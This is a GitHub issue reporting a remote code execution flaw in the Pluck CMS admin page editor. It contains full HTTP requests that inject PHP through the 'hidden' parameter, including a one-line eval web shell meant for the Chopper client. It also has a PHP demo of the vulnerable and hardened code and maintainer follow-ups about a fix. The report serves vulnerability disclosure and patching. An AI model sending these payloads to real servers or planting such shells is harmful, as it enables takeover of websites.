pluck-cms / pluck

Central repo for pluck cms

Home Page:http://www.pluck-cms.org

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page

SecurityCN opened this issue · comments

Vulnerability location:
data\inc\functions.admin.php, lines 531-535

The hidden parameter passed in the POST request is saved into PHP, but the special character (') in its value is not escaped, so the PHP syntax can be closed directly to execute commands remotely, such as phpinfo(), eval(), etc.

Demo:
After the installation succeeds, go to the admin background. Create a new page, enter a title and content, select "Show webpage", submit the request, then capture the request packet and modify the value of the hidden parameter to no';phpinfo();'

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98


http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa

Write a one-line Trojan

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

Connect with Chopper
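The root cause described in the report is a settings value being interpolated straight into generated PHP source. The following is an added illustration, not Pluck's own code: a minimal writer that reproduces that unsafe pattern, placed next to a hardened version that validates the flag against an allowlist and lets var_export() emit a correctly quoted literal. The function names and the temporary file path are assumptions for the demo; the payload string is constructed here to match the shape shown in the report.

```php
<?php
// Added illustration (not Pluck's code): unsafe vs. hardened generation of a
// PHP page file that stores a "hidden" flag. Names below are assumptions.

// UNSAFE: the untrusted value is concatenated into PHP source. With the
// input  no';phpinfo();'  the generated line becomes
//   $hidden = 'no';phpinfo();'';
// and the injected call runs whenever the page file is included.
function write_page_unsafe(string $file, string $hidden): void
{
    $php = "<?php\n\$hidden = '" . $hidden . "';\n";
    file_put_contents($file, $php);
}

// HARDENED: the setting is a yes/no flag, so reject anything else up front,
// then serialise it with var_export(), which escapes quotes and backslashes
// so the stored value can never terminate the string literal.
function write_page_safe(string $file, string $hidden): void
{
    if (!in_array($hidden, ['yes', 'no'], true)) {
        throw new InvalidArgumentException('hidden must be "yes" or "no"');
    }
    $php = "<?php\n\$hidden = " . var_export($hidden, true) . ";\n";
    file_put_contents($file, $php, LOCK_EX);
}

// Demonstration with a constructed payload of the shape from the report.
$payload = "no';phpinfo();'";
$tmp = sys_get_temp_dir() . '/pluck-demo-page.php';

write_page_unsafe($tmp, $payload);
echo "unsafe writer produced:\n", file_get_contents($tmp), "\n";

try {
    write_page_safe($tmp, $payload);
} catch (InvalidArgumentException $e) {
    echo "safe writer rejected payload: ", $e->getMessage(), "\n";
}

write_page_safe($tmp, 'no');
echo "safe writer produced:\n", file_get_contents($tmp), "\n";
unlink($tmp);
```

Run it with `php demo.php`; the unsafe writer emits source containing the injected call, while the hardened writer throws on the payload and, for a legitimate value, writes `$hidden = 'no';`. The allowlist check is the primary control for a boolean setting; var_export() is defence in depth for fields that genuinely need free-form text, where storing the value in a data file (for example JSON) rather than generated PHP is the cleaner design.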

Could you please test the attached version?

pluck-4.7.10-dev3.tar.gz

Have you retested with the latest dev version?